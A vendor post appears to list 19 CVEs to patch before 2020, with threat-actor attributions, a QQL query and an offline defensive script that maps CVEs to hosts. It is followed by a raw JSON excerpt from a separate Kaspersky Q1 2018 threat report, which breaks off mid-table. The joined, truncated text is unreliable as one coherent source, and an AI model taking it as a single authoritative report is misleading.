[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified a set of vulnerabilities (the 19 tracked here are listed below) that should be mitigated before the end of 2019. These are among the vulnerabilities most frequently exploited by Advanced Persistent Threat (APT) actors from all parts of the world.
The table below lists those 19 vulnerabilities. All of them can be tracked and remediated from a single dashboard within Qualys: import the dashboard into your subscription to see which assets in your organization are exposed to which of these CVEs.
**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors**
---|---|---|---|---
**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea)
**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran)
**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea)
**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime)
**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru)
**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea)
**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown
**9** | CVE-2017-8759 | Microsoft .NET Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China)
**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran)
**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran)
**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru)
**13** | CVE-2012-0158 | Microsoft Office and other products using the Windows Common Controls (MSCOMCTL.OCX) | N/A (v3); 9.3 (v2)* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China)
**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China)
**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China)
**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China)
**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China)
**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China)
**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime)
\* CVE-2012-0158 predates CVSS v3 and has no v3 score in NVD; the v2 score is taken from [cvedetails.com](<http://cvedetails.com/>).
### Detecting the Top 19 CVEs
[Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) has detections (QIDs) for these CVEs, covering both remote (unauthenticated) and authenticated checks performed by Qualys scanners and the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).
To return a list of all impacted hosts, use the following QQL query within the VM Dashboard:

```
vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]
```
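The dashboard query above works because Qualys maps each QID to the CVEs it detects. If you would rather produce the same "impacted hosts" list outside the UI (for a ticketing integration, say), the logic is: resolve the 19 CVEs to QIDs from the KnowledgeBase, then walk the host detection list and keep hosts with an open detection of one of those QIDs. The script below is an added example, not code from the original post or from Qualys. It runs offline on constructed XML shaped like the VM API v2 `knowledge_base/vuln` and `asset/host/vm/detection` list responses; the element names follow the public API documentation, while the QIDs (900001 and so on), IPs and hostnames are placeholders invented for the example.

```python
"""Map the top-19 CVE list to Qualys QIDs and list impacted hosts.

Added example, not part of the original Qualys post. Works offline on
constructed XML shaped like the Qualys VM API v2 responses; the QIDs,
IPs and hostnames are made up for illustration.
"""
import xml.etree.ElementTree as ET

TOP_19_CVES = {
    "CVE-2017-11882", "CVE-2018-8174", "CVE-2017-0199", "CVE-2018-4878",
    "CVE-2017-10271", "CVE-2019-0708", "CVE-2017-5638", "CVE-2017-5715",
    "CVE-2017-8759", "CVE-2018-20250", "CVE-2018-7600", "CVE-2018-10561",
    "CVE-2012-0158", "CVE-2017-8570", "CVE-2018-0802", "CVE-2017-0143",
    "CVE-2018-12130", "CVE-2019-2725", "CVE-2019-3396",
}

# Constructed KnowledgeBase excerpt (placeholder QIDs, not real ones).
# One QID can cover several CVEs, and not every QID is on our list.
KB_XML = """<KNOWLEDGE_BASE_VULN_LIST_OUTPUT><RESPONSE><VULN_LIST>
  <VULN><QID>900001</QID><SEVERITY_LEVEL>5</SEVERITY_LEVEL>
    <CVE_LIST><CVE><ID>CVE-2017-11882</ID></CVE><CVE><ID>CVE-2018-0802</ID></CVE></CVE_LIST></VULN>
  <VULN><QID>900002</QID><SEVERITY_LEVEL>5</SEVERITY_LEVEL>
    <CVE_LIST><CVE><ID>CVE-2019-0708</ID></CVE></CVE_LIST></VULN>
  <VULN><QID>900003</QID><SEVERITY_LEVEL>3</SEVERITY_LEVEL>
    <CVE_LIST><CVE><ID>CVE-2019-9999</ID></CVE></CVE_LIST></VULN>
</VULN_LIST></RESPONSE></KNOWLEDGE_BASE_VULN_LIST_OUTPUT>"""

# Constructed host detection excerpt. A detection with STATUS "Fixed" means
# the finding was remediated since the last scan, so it must not be reported.
DETECTION_XML = """<HOST_LIST_VM_DETECTION_OUTPUT><RESPONSE><HOST_LIST>
  <HOST><ID>1</ID><IP>10.0.0.11</IP><DNS>fileserver01</DNS>
    <DETECTION_LIST>
      <DETECTION><QID>900001</QID><TYPE>Confirmed</TYPE><STATUS>Active</STATUS></DETECTION>
      <DETECTION><QID>900003</QID><TYPE>Confirmed</TYPE><STATUS>Active</STATUS></DETECTION>
    </DETECTION_LIST></HOST>
  <HOST><ID>2</ID><IP>10.0.0.12</IP><DNS>rdp-jump01</DNS>
    <DETECTION_LIST>
      <DETECTION><QID>900002</QID><TYPE>Confirmed</TYPE><STATUS>Fixed</STATUS></DETECTION>
    </DETECTION_LIST></HOST>
  <HOST><ID>3</ID><IP>10.0.0.13</IP><DNS>rdp-jump02</DNS>
    <DETECTION_LIST>
      <DETECTION><QID>900002</QID><TYPE>Confirmed</TYPE><STATUS>New</STATUS></DETECTION>
    </DETECTION_LIST></HOST>
</HOST_LIST></RESPONSE></HOST_LIST_VM_DETECTION_OUTPUT>"""

# Detection statuses that still represent an open finding.
OPEN_STATUSES = {"New", "Active", "Re-Opened"}


def qids_for_cves(kb_xml, cves):
    """Return {qid: {cve, ...}} for every KnowledgeBase QID covering one of `cves`."""
    mapping = {}
    for vuln in ET.fromstring(kb_xml).iter("VULN"):
        qid = vuln.findtext("QID")
        hit = {c.findtext("ID") for c in vuln.iter("CVE")} & set(cves)
        if hit:
            mapping[qid] = hit
    return mapping


def impacted_hosts(detection_xml, qid_to_cves):
    """Return {host: sorted CVEs} for hosts with an open detection of a tracked QID."""
    result = {}
    for host in ET.fromstring(detection_xml).iter("HOST"):
        name = host.findtext("DNS") or host.findtext("IP")
        found = set()
        for det in host.iter("DETECTION"):
            if det.findtext("STATUS") in OPEN_STATUSES:
                found |= qid_to_cves.get(det.findtext("QID"), set())
        if found:
            result[name] = sorted(found)
    return result


def report(kb_xml=KB_XML, detection_xml=DETECTION_XML, cves=TOP_19_CVES):
    """End-to-end: CVE list -> QIDs -> hosts with open detections of those QIDs."""
    return impacted_hosts(detection_xml, qids_for_cves(kb_xml, cves))


if __name__ == "__main__":
    for host, found in sorted(report().items()):
        print(f"{host}: {', '.join(found)}")
```

Two details matter in practice: a single QID can cover more than one CVE on the list (the Equation Editor pair CVE-2017-11882 and CVE-2018-0802 is a typical case), so the report is keyed by CVE rather than by QID, and a host whose only detection is in the `Fixed` state is dropped so that remediated machines do not keep showing up as exposed.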
You can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) into your subscription.
### Alerts
The Qualys Cloud Platform lets you continuously monitor for vulnerabilities and misconfigurations and be alerted when they are found on your most critical assets.
See how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).
### Tracking Per-Year Environment Impact and Remediation
The Qualys visualization team has added a Per-Year Environment Insight View Dashboard for tracking and remediation. It ships with release 2.42 and can be found in the dashboard templates library. It covers systems scanned internally or externally, as well as remote and mobile endpoints running the Qualys Cloud Agent.

The Per-Year Environment Insight View Dashboard groups data by year of First Found date, then by Vulnerability Status, Severity, Compliance, Real-Time Threat Indicators (RTIs) from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Date, giving an at-a-glance view across your environment.

### Get Started Now
To start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).
Visit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by Qualys SMEs and the Product Management team and import them into your subscription for further insight into your data.
{"securelist": [{"lastseen": "2018-05-15T21:13:49", "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. 
But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. 
Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. 
This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). 
This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. 
Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). 
The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. 
This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. 
As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. 
Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. 
But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. 
In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). 
As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32. 
